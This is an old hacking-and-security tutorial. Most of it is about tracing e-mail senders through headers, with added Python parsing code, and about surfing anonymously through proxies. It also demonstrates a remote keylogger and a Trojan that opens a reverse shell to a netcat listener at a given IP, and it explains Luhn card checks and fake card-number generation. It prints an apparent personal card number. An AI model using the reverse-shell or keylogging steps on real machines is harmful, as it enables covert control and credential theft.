Reading E-Mail headers
Surfing Anonymously
Multiple domain names, one IP address
Remote keystroke logging
Trojans and how they work
Credit Card Checks
Using our own proxy server
Hiding behind pictures
Rootkits – A hacker's best friend
Firewalls, your best friend
Metasploit
Password Recovering
Bluetooth for remote locking
If you want to talk to someone on a phone anywhere in the world, both of you need a phone number. An international body makes sure that phone numbers are unique: no two phones in the world have the same number. The phone instrument itself does not store the number; the telephone exchange does.
The internet behaves in just the same way. If my computer needs to be on the net, it needs not a phone number but an IP address. IP stands for Internet Protocol, but most people use only the short form. We first use a modem on a telephone line or a network card to connect to an ISP (Internet Service Provider), who gives our computer an IP address. The ISP in turn obtains its blocks of addresses from the registry for its part of the world (APNIC in our case, as we will see below), and the registries between them make sure that IP addresses are unique worldwide.
We will connect to the internet using VSNL over a land-line phone, and also using a Reliance card in a portable computer over a wireless link. We show both methods to make the point that there is no difference between wire-line and wireless: the principles remain the same.
We click on the telephone icon, key in our user name and password in the dialog box and click on Dial. The password is always displayed as stars. After some 30 seconds the modem noise stops and we are connected to the net. The first thing we need to know is the IP address our machine has obtained from the ISP. We right-click the two-monitor icon on the task bar, choose Status and then the Details tab. The last entry tells us our IP address, 219.65.18.178. Each time we reconnect to the internet this address will change.
An IPv4 address is a 32-bit number, so it can have any value from 0 to 4,294,967,295 (just under 4.3 billion). Such numbers are hard to remember, so we write an IP address as four numbers from 0 to 255 separated by dots: the dotted decimal notation. Each of the four numbers is one byte of the 32-bit value, with the first the most significant. To get back the single number, multiply the first by 2 raised to 24 (16,777,216), the second by 65,536, the third by 256 and the last by 1, and add them up. The whole world writes addresses in the dotted form rather than as the single number. Each time we connect again to the net, our ISP gives us a different IP address; try it out for yourself.
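The arithmetic above, as an added example (this code is not from the original page): converting between the dotted form and the 32-bit integer, testing whether an address falls inside a registry range of the kind a whois lookup prints, and checking whether an address is a public one at all. One detail worth noticing while we are at it: the Message-id that Outlook Express generated for the message shown further down, <000a01c5c7d6$0b098830$b21241db@vmci>, ends in b21241db, which is exactly our four octets 219.65.18.178 written last to first in hex.

```python
import ipaddress


def dotted_to_int(addr):
    """Dotted decimal -> 32-bit integer. The first octet is the most significant byte,
    so 219.65.18.178 = 219*2**24 + 65*2**16 + 18*2**8 + 178."""
    octets = addr.strip().split(".")
    if len(octets) != 4:
        raise ValueError("not a dotted-decimal IPv4 address: %r" % addr)
    value = 0
    for o in octets:
        # reject leading zeros: some parsers read '010' as octal, so '10.010.1.1' is ambiguous
        if not o.isdigit() or (len(o) > 1 and o[0] == "0") or int(o) > 255:
            raise ValueError("bad octet %r in %r" % (o, addr))
        value = (value << 8) | int(o)
    return value


def int_to_dotted(value):
    """The inverse: peel off four bytes, most significant first."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("out of 32-bit range: %r" % value)
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def valid_dotted(addr):
    try:
        dotted_to_int(addr)
        return True
    except ValueError:
        return False


def in_inetnum(addr, first, last):
    """Is addr inside a whois 'inetnum: first - last' range? Comparing the integers
    is the whole trick; the dotted form is only for human eyes."""
    return dotted_to_int(first) <= dotted_to_int(addr) <= dotted_to_int(last)


def is_routable(addr):
    """False for the RFC 1918 private ranges, loopback and the like: addresses no
    registry will ever list, so there is no owner to ask about them."""
    return not ipaddress.IPv4Address(addr).is_private


def reversed_hex(addr):
    """The four bytes written last-to-first as hex, the form in which the page's
    Outlook Express Message-id happens to carry the same address ($b21241db)."""
    return "".join("%02x" % int(o) for o in reversed(addr.split(".")))


if __name__ == "__main__":
    ip = "219.65.18.178"
    print(ip, "=", dotted_to_int(ip), "=", int_to_dotted(dotted_to_int(ip)))
    print("in VSNL-IN range:", in_inetnum(ip, "219.64.0.0", "219.65.255.255"))
    print("routable:", is_routable(ip), "| 172.16.28.181 routable:", is_routable("172.16.28.181"))
    print("reversed hex:", reversed_hex(ip))
```

Run it as a script to see the address as a single number, the range test against the APNIC record quoted later on this page, and the reversed-hex form.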
We now start Outlook Express, the free program that comes with Windows for reading e-mail. We want to send ourselves an e-mail, so we click on Create Mail and in the New Message dialog write our own address, vmukhi@vsnl.com, in the To box, i.e. we are sending an e-mail to ourselves. In the Subject box we write From vsnl and click on Send. After a few seconds we click on Send/Receive and receive the e-mail we have just sent.
On the e-mail we click the right mouse button as always, choose the last option, Properties, and then the Details tab. Clicking on Message Source shows the headers of the e-mail in a bigger window. This is what we see.
Return-path: <vmukhi@vsnl.com>
Received: from smtp3.vsnl.net (smtp3.vsnl.net [172.16.28.233])
 by pop1.vsnl.net (vsnl mail server) with ESMTP id <0INR001MXPHMDE@pop1.vsnl.net>
 for vmukhi@vsnl.com; Mon, 03 Oct 2005 10:21:22 +0530 (IST)
Received: from vmci (localhost [127.0.0.1])
 by smtp3.vsnl.net (vsnl mail server) with ESMTPA id <0INR008BLPHKTP@smtp3.vsnl.net>
 for vmukhi@vsnl.com (ORCPT vmukhi@vsnl.com); Mon, 03 Oct 2005 10:21:22 +0530 (IST)
Received: from ([219.65.18.178])
 by smtp3.vsnl.net (InterScan E-Mail VirusWall Unix); Mon, 03 Oct 2005 10:21:22 +0530 (IST)
Content-return: prohibited
Date: Mon, 03 Oct 2005 10:20:55 +0530
From: Vijay Mukhi <vmukhi@vsnl.com>
Subject: From vsnl
Sender: vmukhi@vsnl.com
To: vmukhi@vsnl.com
Message-id: <000a01c5c7d6$0b098830$b21241db@vmci>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
Content-type: multipart/alternative; boundary="----=_NextPart_000_0007_01C5C804.23DA7170"
X-Priority: 3
X-MSMail-priority: Normal
Original-recipient: rfc822;vmukhi@vsnl.com

This is a multi-part message in MIME format.
Anyone looking at this output for the first time will wonder whether it can be understood at all. The headers were written by computers, so a layman will find them hard to read. Our e-mail may pass through many mail servers on the way. Each server that handles the message adds a line recording which machine it received the message from, with that machine's IP address. This is how we can find out which servers our e-mail has passed through: every entity on the net has an IP address, and so we see the addresses of all of them.
There are several lines that start with 'Received: from'. Each server that receives the e-mail adds one such header, and adds it at the top, so the order is the reverse of what we would expect: the first Received line is the last server the message passed through, and the last Received line is the first, the one that records the sender. After the word from we see our computer's IP address in square brackets, [219.65.18.178], and this is how we get at the IP address of the computer, not the person, that sent the e-mail. There is no way of knowing which physical person sent it; all we know is the IP address of the computer. One caveat: everything below the first Received line added by a server we trust was under the sender's control, so a sender can forge extra Received lines of his own. The lines added by our own ISP's servers are the ones we can rely on.
We also get the date and time the e-mail was sent. In our case it is 3 October 2005 at 10:21 in the morning, the time we are writing this tutorial. The time carries the offset +0530 (IST) because we are five and a half hours ahead of GMT (Greenwich Mean Time, today called UTC). Our server, VSNL, is in India, so its time is IST. Servers outside India stamp their own local time, so to relate a time stamp to an IP address handed out by an Indian ISP we have to learn how to convert between time zones.
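The following is an added example, not code from the tutorial, of doing by program what the text does by eye: it walks the Received chain of the first message on this page (embedded below as a constructed sample, refolded into standard continuation lines), pulls out the bracketed IP and the host that stamped each hop, converts every time stamp to IST, and picks the originating address from the earliest hop stamped by a server we trust, so that a Received line forged by the sender lower down cannot mislead us. The trusted-suffix rule (".vsnl.net") and the IST constant are assumptions for the demonstration. The to_ist helper is the same conversion that the BST, PDT and GMT stamps on the later messages on this page need.

```python
import re
from datetime import timedelta, timezone
from email import message_from_string
from email.utils import parsedate_to_datetime

IST = timezone(timedelta(hours=5, minutes=30))

# The headers of the first test message on this page (VSNL to VSNL), refolded the way a
# mail client stores them: continuation lines start with whitespace.
SAMPLE_HEADERS = """\
Return-path: <vmukhi@vsnl.com>
Received: from smtp3.vsnl.net (smtp3.vsnl.net [172.16.28.233])
 by pop1.vsnl.net (vsnl mail server) with ESMTP id <0INR001MXPHMDE@pop1.vsnl.net>
 for vmukhi@vsnl.com; Mon, 03 Oct 2005 10:21:22 +0530 (IST)
Received: from vmci (localhost [127.0.0.1])
 by smtp3.vsnl.net (vsnl mail server) with ESMTPA id <0INR008BLPHKTP@smtp3.vsnl.net>
 for vmukhi@vsnl.com (ORCPT vmukhi@vsnl.com); Mon, 03 Oct 2005 10:21:22 +0530 (IST)
Received: from ([219.65.18.178])
 by smtp3.vsnl.net (InterScan E-Mail VirusWall Unix); Mon, 03 Oct 2005 10:21:22 +0530 (IST)
Date: Mon, 03 Oct 2005 10:20:55 +0530
From: Vijay Mukhi <vmukhi@vsnl.com>
Subject: From vsnl
To: vmukhi@vsnl.com

"""

BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
FROM_HOST = re.compile(r"^from\s+([^\s(\[;]*)", re.IGNORECASE)
BY_HOST = re.compile(r"\bby\s+([^\s(;]+)", re.IGNORECASE)


def _aware(dt):
    # '-0000' means 'zone unknown' and comes back naive; treat it as UTC
    return dt if dt.tzinfo is not None else dt.replace(tzinfo=timezone.utc)


def parse_received(value):
    """Break one Received header into the pieces an investigator wants:
    who handed the message over (name and bracketed IP), who took it, and when."""
    text = " ".join(value.split())                       # unfold continuation lines
    clause, sep, stamp = text.rpartition(";")            # the timestamp follows the last ';'
    if not sep:
        clause, stamp = text, ""
    from_clause = re.split(r"\s+by\s+", clause, maxsplit=1)[0]
    host = FROM_HOST.match(from_clause)
    ips = BRACKETED_IP.findall(from_clause)
    by = BY_HOST.search(clause)
    when = _aware(parsedate_to_datetime(stamp.strip())) if stamp.strip() else None
    return {
        "from": host.group(1) if host else "",
        "ip": ips[-1] if ips else None,                   # the bracketed IP in the 'from' part
        "by": by.group(1) if by else None,
        "time": when,
        "time_ist": when.astimezone(IST) if when else None,
    }


def received_chain(raw_message):
    """Return the hops oldest-first. Each server prepends its Received line, so the
    header order is newest-first and we reverse it to follow the message's path."""
    msg = message_from_string(raw_message)
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    hops.reverse()
    return hops


def origin_ip(hops, trusted_by_suffix):
    """The bracketed IP recorded by the earliest hop whose 'by' host we trust.
    Anything older than that in the chain could have been forged by the sender."""
    for hop in hops:
        if hop["by"] and hop["by"].endswith(trusted_by_suffix):
            return hop["ip"]
    return None


def to_ist(date_header):
    """Normalise any RFC 2822 date (BST, PDT, GMT ...) to IST for comparison."""
    return _aware(parsedate_to_datetime(date_header)).astimezone(IST)


if __name__ == "__main__":
    chain = received_chain(SAMPLE_HEADERS)
    for hop in chain:
        print("%-16s took it from %-16s [%s] at %s" % (hop["by"], hop["from"] or "-", hop["ip"],
              hop["time_ist"].strftime("%d %b %Y %H:%M:%S IST")))
    print("origin:", origin_ip(chain, ".vsnl.net"))
    print("Yahoo's BST stamp in IST:", to_ist("Mon, 03 Oct 2005 06:13:48 +0100 (BST)"))
```

Paste any other message's headers into received_chain to get the same oldest-first walk; the one thing to set deliberately is the trusted suffix, which should name your own provider's servers and nothing else.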
The next question is how to figure out which ISP owns an IP address. We know it is VSNL in our case, but given an arbitrary IP address, how do we find the owner? It is the owner who, given a date and time, can tell us which user was allocated that address. Every ISP keeps this log because it is needed for billing, so internally an ISP records every IP address, the time it was given to a certain user and for how long.
We go to the site www.apnic.net, the registry for IP allocations in our part of the world. In the Whois search box we write the above IP address, 219.65.18.178, and click on Go. We see a page with the data below.
inetnum: 219.64.0.0 - 219.65.255.255
netname: VSNL-IN
descr: Videsh Sanchar Nigam Ltd - India.
descr: Videsh Sanchar Bhawan, M.G. Road
descr: Fort, Bombay 400001
country: IN
This tells us that VSNL in India owns the above address. The record also gives names and phone numbers of people to contact. This is how we trace the computer, not the person, that sent us the e-mail: the registry gives us the ISP, and only the ISP's own logs can map the address and time to a subscriber.
Let us take it a step further and send ourselves an e-mail from Yahoo. We navigate to http://in.yahoo.com/ and click on the Mail icon. We key in our Yahoo id, vijaymukhi712, and password and click on Sign In, then click on Compose to create an e-mail. In the To box we write vmukhi@vsnl.com and as the subject from yahoo, and click on Send. After some time we receive the e-mail in Outlook Express after clicking on Send/Receive. Once again we select the e-mail, right-click, and choose Properties, Details, Message Source to see the following.
Return-path: <vijaymukhi712@yahoo.co.in>
Received: from mta3 ([172.16.28.188]) by pop1.vsnl.net (vsnl mail server)
 with ESMTP id <0INR001YGQJ5DE@pop1.vsnl.net> for vmukhi@vsnl.com; Mon, 03 Oct 2005 10:43:55 +0530 (IST)
Received: from web8610.mail.in.yahoo.com (web8610.mail.in.yahoo.com [202.43.219.85])
 by mta3.vsnl.net (vsnl mail server) with SMTP id <0INR00AGYQJ04W@mta3.vsnl.net>
 for vmukhi@vsnl.com; Mon, 03 Oct 2005 10:43:53 +0530 (IST)
Received: (qmail 75175 invoked by uid 60001); Mon, 03 Oct 2005 05:13:48 +0000
Received: from [219.65.18.178] by web8610.mail.in.yahoo.com via HTTP; Mon, 03 Oct 2005 06:13:48 +0100 (BST)
Date: Mon, 03 Oct 2005 06:13:48 +0100 (BST)
From: vijay mukhi <vijaymukhi712@yahoo.co.in>
Subject: from yahoo
To: vmukhi@vsnl.com
The last Received line shows very clearly that this e-mail was sent from our IP address, 219.65.18.178, on 3 October at 06:13:48. The stamp reads +0100 (BST): BST is British Summer Time, one hour ahead of GMT and four and a half hours behind us, which is why it is 6 in the morning in London. To convert to IST we add 4 hours 30 minutes, giving 10:43, the time we sent the e-mail from Yahoo. The qmail line just above it records the same instant as 05:13:48 +0000, so comparing the two stamps is a quick check that the conversion is right.
Let us now do the reverse and send an e-mail from Outlook Express to our Yahoo account. We click on Create Mail in Outlook Express, write vijaymukhi712@yahoo.co.in in the To box and vijay1 as the subject, and click on Send. In Yahoo we click on Check Mail and then have to wait some time (a lot of time) before Yahoo receives our e-mail.
X-Apparently-To: vijaymukhi712@yahoo.co.in via 202.43.219.84; Mon, 03 Oct 2005 11:12:16 +0530
X-Originating-IP: [203.200.235.233]
Return-Path: <vmukhi@vsnl.com>
Authentication-Results: mta116.mail.in.yahoo.com from=vsnl.com; domainkeys=neutral (no sig)
Received: from 203.200.235.233 (EHLO smtp3.vsnl.net) (203.200.235.233)
 by mta116.mail.in.yahoo.com with SMTP; Mon, 03 Oct 2005 11:12:16 +0530
Received: from vmci (localhost [127.0.0.1]) by smtp3.vsnl.net (vsnl mail server) with ESMTPA id
 <0INR006RZQZIZQ@smtp3.vsnl.net> for vijaymukhi712@yahoo.co.in; Mon, 03 Oct 2005 10:53:44 +0530 (IST)
Received: from ([219.65.18.178]) by smtp3.vsnl.net (InterScan E-Mail VirusWall Unix); Mon, 03 Oct 2005 10:53:44 +0530 (IST)
Date: Mon, 03 Oct 2005 10:53:18 +0530
The last Received line tells us that the e-mail came from 219.65.18.178 at 10:53 in the morning. Notice that Yahoo's own X-Originating-IP header does not carry our dial-up address but 203.200.235.233, the public address of VSNL's smtp3 relay that handed the message to Yahoo (the same address appears in the Received line Yahoo added). A web-mail provider's X-Originating-IP records the last hop it saw, so for mail relayed through an ISP we still have to read the ISP's own Received lines to get at the sender. Full headers are off by default in Yahoo; to turn them on we click on Options, General Preferences, then Messages, Show all headers. Not all sites allow e-mail headers to be displayed.
We next go to www.hotmail.com, write our e-mail address vijaymukhi712@hotmail.com and password, and click on Sign In. We click on New Message to send an e-mail, write vmukhi@vsnl.com in the To box and from hotmail as the subject, and click on Send. We immediately get the e-mail in Outlook Express; we select it and choose right mouse button, Properties, Details, Message Source, and this is what we see.
Return-path: <vijaymukhi712@hotmail.com>
Received: from mta3 ([172.16.28.188]) by pop1.vsnl.net (vsnl mail server)
 with ESMTP id <0INR003QUR7O2C@pop1.vsnl.net> for vmukhi@vsnl.com; Mon, 03 Oct 2005 10:58:41 +0530 (IST)
Received: from hotmail.com (bay12-f16.bay12.hotmail.com [64.4.35.16])
 by mta3.vsnl.net (vsnl mail server) with ESMTP id <0INR00D2MR7P4V@mta3.vsnl.net>
 for vmukhi@vsnl.com; Mon, 03 Oct 2005 10:58:38 +0530 (IST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sun, 02 Oct 2005 22:28:36 -0700
Received: from 63.236.40.157 by by12fd.bay12.hotmail.msn.com with HTTP; Mon, 03 Oct 2005 05:28:36 +0000 (GMT)
Date: Mon, 03 Oct 2005 05:28:36 +0000
From: Vijay mukhi <vijaymukhi712@hotmail.com>
Subject: From hotmail
X-Originating-IP: [219.65.18.178]
X-Sender: vijaymukhi712@hotmail.com
To: vmukhi@vsnl.com
Here the Received lines do not show our IP address at all (the 'from 63.236.40.157' line records an address inside Hotmail's side of the exchange, not our machine), but there is a header called X-Originating-IP that carries 219.65.18.178. The time is given as 05:28 with +0000, which signifies GMT. Adding five and a half hours gives 10:58, which matches the time VSNL's mta3 received it, 10:58:38 IST. This is how we track e-mail sent from a web-based provider: look for the header in which the provider records the browser's address, since the Received chain only starts at the provider's own servers.
When we send an e-mail from VSNL to Hotmail, these are the headers Hotmail shows.
MIME-Version: 1.0
Received: from smtp3.vsnl.net ([203.200.235.233]) by mc3-f34.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Sun, 2 Oct 2005 22:29:52 -0700
Received: from vmci (localhost [127.0.0.1]) by smtp3.vsnl.net (vsnl mail server) with ESMTPA id <0INR0084TR8XTP@smtp3.vsnl.net> for vijaymukhi712@hotmail.com; Mon, 03 Oct 2005 10:59:23 +0530 (IST)
Received: from ([219.65.18.178]) by smtp3.vsnl.net (InterScan E-Mail VirusWall Unix); Mon, 03 Oct 2005 10:59:23 +0530 (IST)
Sender: vmukhi@vsnl.com
X-Message-Info: JGTYoYF78jGvQKHDMF06vXk+0nDlQ6k+ucYOO0FXePE=
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MSMail-priority: Normal
Return-Path: vmukhi@vsnl.com
X-OriginalArrivalTime: 03 Oct 2005 05:29:53.0445 (UTC) FILETIME=[7B8BC550:01C5C7DB]
The last Received line shows our IP address, and its time is IST because it was stamped by a server in India. The line Hotmail added is stamped in Hotmail's own zone, 22:29:52 -0700, which is 05:29:52 GMT or 10:59:52 IST, a few seconds after VSNL's stamp, as we would expect; X-OriginalArrivalTime records the same instant in UTC. To see e-mail headers in Hotmail, choose Options, on the left choose Mail, then Mail Display Settings, and then the radio button Advanced under Message Headers.
We then move to www.yahoo.com and click on the Mail icon. We log in as svmukhi and click on Compose. We write the same address, vmukhi@vsnl.com, and the subject from yahoo, and send it. In Outlook Express we again use right mouse button, Properties, Details, Message Source to see the following.
Return-path: <svmukhi@yahoo.com>
Received: from mta3 ([172.16.28.188]) by pop1.vsnl.net (vsnl mail server)
 with ESMTP id <0INR003TBSHA2C@pop1.vsnl.net> for vmukhi@vsnl.com; Mon, 03 Oct 2005 11:26:00 +0530 (IST)
Received: from web50408.mail.yahoo.com (web50408.mail.yahoo.com [206.190.38.73])
 by mta3.vsnl.net (vsnl mail server) with SMTP id <0INR00CXPSH8IO@mta3.vsnl.net>
 for vmukhi@vsnl.com; Mon, 03 Oct 2005 11:25:58 +0530 (IST)
Received: (qmail 98590 invoked by uid 60001); Mon, 03 Oct 2005 05:55:56 +0000
Received: from [219.65.18.178] by web50408.mail.yahoo.com via HTTP; Sun, 02 Oct 2005 22:55:56 -0700 (PDT)
Date: Sun, 02 Oct 2005 22:55:56 -0700 (PDT)
From: Sonal Mukhi <svmukhi@yahoo.com>
Subject: from yahoo
We once again see our IP address, 219.65.18.178, in the last Received line, but the date and time are 2 October, 22:55. The stamp is in PDT, Pacific Daylight Time, which is 7 hours behind GMT. So we add 7 hours to 22:55, which gives 05:55 GMT on 3 October (the qmail line confirms this), and then add 5:30 to convert to our time, which gives 11:25 IST, in agreement with the 11:25:58 at which VSNL's mta3 received it. That is how we convert PDT to IST: add twelve and a half hours, and move the date forward by one day when the sum crosses midnight.
We next log into VSNL's web mail at http://webmail.vsnl.com. We log in as vmukhi, choose the server vsnl.com and write our password. We click on Compose, send ourselves an e-mail at vmukhi@vsnl.com, and see the following headers.
Return-path: <vmukhi@vsnl.com>
Received: from vsnl.net (pop1.vsnl.net [172.16.28.144]) by pop1.vsnl.net (vsnl mail server)
 with ESMTP id <0INR0032DSWP2C@pop1.vsnl.net> for vmukhi@vsnl.com; Mon, 03 Oct 2005 11:35:13 +0530 (IST)
Received: from [172.16.28.181] by pop1.vsnl.net (mshttpd); Mon, 03 Oct 2005 11:05:13 +0500
Date: Mon, 03 Oct 2005 11:05:13 +0500
From: vmukhi@vsnl.com
Subject: Hi
To: vmukhi@vsnl.com
Message-id: <7d9a27ab00.7ab007d9a2@vsnl.net>
MIME-version: 1.0
The last Received line carries a different IP address, 172.16.28.181, and its time is labelled +0500 rather than +0530: the web-mail server has its zone set to five hours ahead of GMT instead of five and a half, so its 11:05 +0500 is the same instant as the 11:35 +0530 stamped by pop1.vsnl.net a moment later. We have to add half an hour to get our time, which shows that the offset a server writes is only as good as that server's clock and configuration. APNIC tells us that 172.16.28.181 is not allocated by it at all. For the African region we would go to http://www.afrinic.net/, for North America to http://www.arin.net/, for Latin America to http://lacnic.net/en/index.html and for Europe to http://www.ripe.net/.
We go to a site like www.samspade.org and in the IP Whois box enter the address. We are told that it is reserved: 172.16.0.0 to 172.31.255.255 is one of the private ranges set aside by RFC 1918 for use inside networks, which is why it appears on no registry's books. The address belongs to a machine inside VSNL's own network, so from outside there is no way of finding out who sent the e-mail.
We then went to the site http://mailer.us.tf/ and sent an e-mail to vmukhi@vsnl.com from that page. The e-mail headers were as follows.
Return-path: <tprf011@diffusion.agava.com>
Received: from mta3 ([172.16.28.188]) by pop1.vsnl.net (vsnl mail server)
 with ESMTP id <0INR004X3V51W1@pop1.vsnl.net> for vmukhi@vsnl.com; Mon, 03 Oct 2005 12:23:28 +0530 (IST)
Received: from eternity.agava.net (eternity.agava.net [198.173.4.2])
 by mta3.vsnl.net (vsnl mail server) with ESMTP id <0INR00CHOV4RP7@mta3.vsnl.net>
 for vmukhi@vsnl.com; Mon, 03 Oct 2005 12:23:26 +0530 (IST)
Received: from diffusion.agava.com (diffusion.agava.com [198.173.4.9])
 by eternity.agava.net (Postfix) with ESMTP id 7C1641535A for <vmukhi@vsnl.com>;
 Mon, 03 Oct 2005 01:53:14 -0500 (CDT)
Received: by diffusion.agava.com (Postfix, from userid 3665) id 7869DBC61B2; Mon, 03 Oct 2005 01:53:14 -0500 (CDT)
Date: Mon, 03 Oct 2005 12:22:13 +0000
From: "" <>
To: vijay <vmukhi@vsnl.com>
Message-id: <20051003065314.7869DBC61B2@diffusion.agava.com>
The earliest Received line here has no 'from' host or IP address at all; it says the message was handed to Postfix locally by a process running as userid 3665, i.e. the web form on the server itself. Once again there is no way of knowing who sent this e-mail. The server is 5 hours behind GMT (-0500, CDT), so 01:53:14 is 06:53:14 GMT, to which we add 5:30 to get 12:23 IST, the time on my watch to within a few minutes. My IP address is never sent out. The Date header, 12:22:13 labelled +0000, is whatever the form chose to write (it is in fact our local time), one more reason to rely on Received lines rather than on Date. If a server like this refuses to record the address it was contacted from, there is no way of finding out who sent the mail short of the operator's own logs, and there are a large number of such anonymous e-mail servers in the world.
Surfing Anonymously
When we go to the web site http://www.trafficzap.com/showip.php or www.ipadressguide.com, we are told our IP address in the top left-hand corner. We would now like to hide our IP address from the world. We go to http://www.space.net.au/~thomas/quickbrowse.html, which gives a predefined list of sites that offer anonymous browsing. We write the url http://www.trafficzap.com/showip.php in each of the boxes and the site reports a different IP address each time. The first box, Anonymizer, gives an IP address of 168.143.113.59. The second, Guardster, takes us to the Guardster site, where we write the url again and click on the link for surfing anonymously; this time we get an IP address of 64.246.18.83. The fourth, Proxy One, gives 65.110.6.34. This is how we can surf the net appearing to come from some other IP address.
When we go through a proxy server, the IP address on our packets as they leave the proxy is the proxy's, and where we go from there nobody between us and the proxy can tell. Our government can stop us from visiting a particular site by configuring the routers on Indian territory to drop packets to a certain IP address, and it can block a proxy it knows about in the same way, but it cannot block what it does not know we are visiting.
The point is that no one other than the proxy knows where we are headed. This is why governments have a problem blocking sites: they can only stop us from visiting sites they know of. The flip side is that the proxy operator sees every request we make, so we have only moved our trust from the ISP to the proxy.
There are a large number of proxy servers on the net, http://www.behidden.com/ for example, that allow you to surf anonymously.
There is another way of being invisible on the net. We downloaded the file invisiblebrowsing.exe after filling out a form at http://www.amplusnet.com/products/invisiblebrowsing/download.htm. We arrive at a dialog box, and before we do anything we note our IP address. We then click on the down arrow of the list box and, if it is empty, click on Refresh List.
After a wait of a few seconds we see a long list of proxy servers from all over the world that we can use. We choose one by double-clicking on it, and on the dialog box we click on Start Testing. After a couple of seconds we get the green signal that the proxy is ready, and we click on Done. This adds the proxy to our list of proxies, which for now has one entry.
We tick the check box Enable Invisible Browsing and browse to www.ipaddressguide.com, which tells us the IP address it sees. If we click on the button What is my IP in the dialog box we are taken to http://www.amplusnet.com/services/whatismyip/whatismyip.asp, which displays our IP address. We then go to http://www.whatismyip.com/, which shows an address different again from what the other sites showed, and finally to http://www.whatismyipaddress.com/, which shows yet another (this last site takes some time to load). Wherever we go we appear under a new IP address. The good thing about Invisible Browsing is that we do not have to change the browser settings ourselves.
If we click on the Online Privacy button the program deletes the cache and the other things IE stores internally: cookies, history, temporary internet files, auto-complete forms and passwords. It can also block JavaScript and ActiveX controls, which is useful if you are using someone else's computer. The program listens on port 8080 to route the traffic, so we must make sure no other program is using that port.
We can choose as many proxies as we want and the program will change proxy every 10 minutes. We then pinged www.whatismyip.com, whose IP address is 63.209.100.216, captured the traffic with Ethereal, and never saw a single packet going to that address: all our packets go to the proxies, and only they talk to the site. There is a lot of traffic flowing to and from different IP addresses, some of which we will try to explain.
At times it is better to right-click in the main window and choose Test All Proxies, because the program will not use a proxy that has not been tested. With the Invisible Browsing check box unticked we go to IE, Tools, Internet Options, Connections, LAN Settings, and see that the proxy check box is off. We close the dialog box, tick Invisible Browsing in our program, and when we click on LAN Settings again the proxy setting is on, with the server 127.0.0.1 and port 8080: the program is a local proxy that IE talks to, and it forwards everything to the remote proxy of the moment.
We move to another site, http://www.multiproxy.org/downloads.htm, and download the file mproxy12.zip at the bottom of the page. When we run the program we get a small dialog box. Like it or not, at start-up it tests every proxy in its list to see whether it is up, which can take about a minute. We click on the Proxy List tab, choose Options, and at the dialog box choose the second tab, Proxy Server List.
We should see a list of at least 9 proxy servers, each marked with a red or green dot: red means down, green means up. If we do not have at least one green proxy we have a problem, so we click on the Menu button and then on Add.
In the dialog box we write the address of a working proxy server. The one we used is 193.63.75.19 on port 3127. The program tests the proxy and marks it green or red. All that is left is to enable the proxy server in IE's LAN settings, with the address 127.0.0.1 and the port changed to 8088 instead of 8080.
Now when we surf we see messages flashing in the main proxy window, and each time we get a different IP address. Both products work in the same way. The modem proxy settings have no effect here; the values we place there are ignored.
Multiple domain names, one IP address
Ping is a tool available on every operating system that tells you whether a system is alive and kicking. Thus ping www.vijaymukhi.com does two things: it tells us whether my server is up, and it gives us its IP address, in this case 70.85.134.18. We now ping another site, www.venusjewel.com, and get the same address, 70.85.134.18. Both vijaymukhi.com and venusjewel.com share one IP address.
Thus if we block vijaymukhi.com by dropping packets to 70.85.134.18, we also block venusjewel.com, and the other site can sue. Since one address is routinely shared by many unrelated sites, blocking a domain name by blocking its IP address is not a practical option.
Remote keystroke logging
We have written some code to demonstrate various techniques hackers use. One of them is installing a program called a keystroke logger, which records every key pressed on the keyboard and sends it to another machine somewhere else in the world. All our code is in the directory cybercode.
Our remote portable has the IP address 220.224.5.20, and on it we run the program keyloggerserver in a DOS box. This program waits for a client to connect to it. The client is called keyloggerclient and we run it as
keyloggerclient 220.224.5.20
From now on, whatever key we press on the client, a copy appears on the server. We have an html file, keylogger.html, that lets us key a password into a text box that shows stars; on our server we see the actual text. Thus anything an unsuspecting user types on the client, the server also gets a copy of.
The batch file keylogger.bat builds the two .exe files. The two .c files, keyloggerclient.c and keyloggerserver.c, show how small the code for these programs is.
Trojans and how they work
We have written a small demo program, Trojan, which demonstrates how a Trojan works. A popular program on the net called nc or netcat is the Swiss army knife of networking; every network administrator has a copy of it, and it is freely downloadable. On the server, the machine we control, we run it as
nc -l -p 4444
It does nothing and simply waits for a connection. On the client, the suspect's machine, we run the Trojan as
Trojan 220.224.51.58
where the address is that of our server. The minute we run it, a command prompt appears on our server: the Trojan has connected back to port 4444 and attached a shell to the connection. When we type dir we are actually running dir on the client, not on the server. If we type cd\, we move to the root of drive C on the client. When we run notepad, it runs on the client and not on the server; we know this because it shows up in the Task Manager of the client and not of the server. So notepad is running on the client's machine, yet nothing is visible there. Only when we type exit on the server does the connection break, and then the copies of notepad appear out of nowhere on the client. While the connection is up there are no visible signs on the client that a server is controlling it.
This is how we type commands on the server and have them run on the client. This is how a machine can be controlled remotely: once the Trojan is running, all the server needs is an IP address for it to connect back to.
Credit Card Checks
Every credit card number has a structure. The first digit tells us which company issued the card: 4 means Visa, 5 means MasterCard. Each time we give a credit card number on the net, the following calculation is carried out to check that the number is well formed. Below is my Visa credit card number, and under it the working.
4 3 8 5 8 7 9 0 0 6 7 3 1 0 2 4
8 16 16 18 0 14 2 4
7 7 9 5
We set the last digit, the check digit, aside and, starting with the digit to its left and moving leftwards, double every second digit. The second row shows these doubled values. If a doubled value is larger than 9 we either add its two digits together or, what comes to the same thing, subtract 9 from it; the third row shows the four values that needed this. We then add up all sixteen digits, doubled and undoubled, and the total must be divisible by 10: 70 in our case. This calculation is called the Luhn algorithm after Hans Peter Luhn, the German-born IBM scientist who devised it.
This check is made each time a card number is given on the net, and at times the expiry date is checked too. The actual balance is not always checked, as that is slow and expensive. A program that generates a fake credit card number simply generates random digits and then chooses the last digit so that the above rule is satisfied; the check catches typing errors, not forged numbers.
Giving a credit card number on the net is safer than handing the card to a waiter in a restaurant. We have a PowerPoint presentation on this in the file creditcard.ppt.
